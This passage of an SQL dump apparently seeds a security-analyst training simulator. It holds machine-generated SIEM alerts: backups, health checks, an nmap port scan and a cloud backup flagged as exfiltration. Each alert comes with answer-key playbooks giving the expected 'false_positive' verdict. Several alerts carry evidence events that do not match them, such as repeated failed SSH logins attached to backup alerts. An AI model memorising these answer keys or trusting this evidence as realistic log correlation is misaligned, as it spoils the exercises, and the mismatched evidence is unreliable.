1-65535 192.168.1.200\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.200\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.200\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.200\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1814, 'Authorized Administrative Backup Processes Detected', 'low', 'Wazuh', 'Backup processes were detected on the server. These are scheduled and authorized administrative tasks.', 'Unauthorized Access', 'T1053', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:40:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"backup_user\",\"hostname\":\"backup_server\",\"command_line\":\"/usr/bin/rsync -av /data /backup\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for scheduled backups\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/rsync -av /data /backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled backup command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_maintenance\",\"analysis_notes\":\"This is a scheduled and authorized backup process. 
No unauthorized access detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event 
count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1815, 'Benign System Health Check Activity', 'low', 'Elastic SIEM', 'System health checks detected on multiple servers. These checks are part of regular monitoring tasks.', 'System Monitoring', 'T1016', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:25:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.15\",\"dst_ip\":\"10.1.1.20\",\"username\":\"monitor_user\",\"hostname\":\"health_check\",\"command_line\":\"ping -c 4 10.1.1.20\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ping -c 4 10.1.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine system health check command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_monitoring\",\"analysis_notes\":\"Routine system health checks detected. 
No suspicious activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1816, 'Misconfigured Legacy Application Generating Suspicious Traffic', 'medium', 'Azure Sentinel', 'A legacy application was detected generating potentially suspicious traffic patterns. Investigation revealed it was a misconfiguration.', 'Anomaly Detection', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:34Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"203.0.113.10\",\"username\":\"legacy_app\",\"hostname\":\"legacy_server\",\"command_line\":\"java -jar legacyapp.jar\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"java -jar legacyapp.jar\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Misconfigured application generating unusual traffic\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly_detection\",\"analysis_notes\":\"The traffic was traced back to a misconfigured legacy application. 
No malicious intent detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1817, 'Authorized IT Maintenance Process Triggered Alert', 'low', 'Wazuh', 'An IT maintenance script was executed as part of routine maintenance, triggering an alert due to its network activity.', 'Malware', 'T1087', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:10:55Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.2.15\",\"dst_ip\":\"10.0.2.30\",\"username\":\"maintenance_user\",\"hostname\":\"maintenance_host\",\"command_line\":\"python maintenance_script.py\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for IT maintenance\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python maintenance_script.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine maintenance script execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_maintenance\",\"analysis_notes\":\"Authorized maintenance process detected. 
No malicious activity found.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated 
event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1818, 'Routine IT Vulnerability Scanning Detected as Brute Force Attack', 'medium', 'Splunk', 'A series of login failures from an internal IP address were detected, resembling a brute force attack. Upon investigation, these attempts align with routine vulnerability scanning conducted by IT.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:25:43Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.25\",\"username\":\"admin\",\"hostname\":\"server1\",\"failed_attempts\":20}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for scheduled vulnerability scans\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is an internal address used by IT for routine vulnerability scanning, not an actual brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:04:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:03:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:02:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:01:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user 
admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1819, 'Authorized Administrative Backup Misidentified as Data Exfiltration', 'high', 'Azure Sentinel', 'Large data transfer from a sensitive file server to an external IP address detected. This is part of an authorized backup process to a cloud storage service.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:27Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"203.0.113.50\",\"hostname\":\"backup-server\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP assigned to backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted cloud storage service\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Common hash for an empty file\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer was part of a scheduled backup to a verified cloud service, not unauthorized exfiltration.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
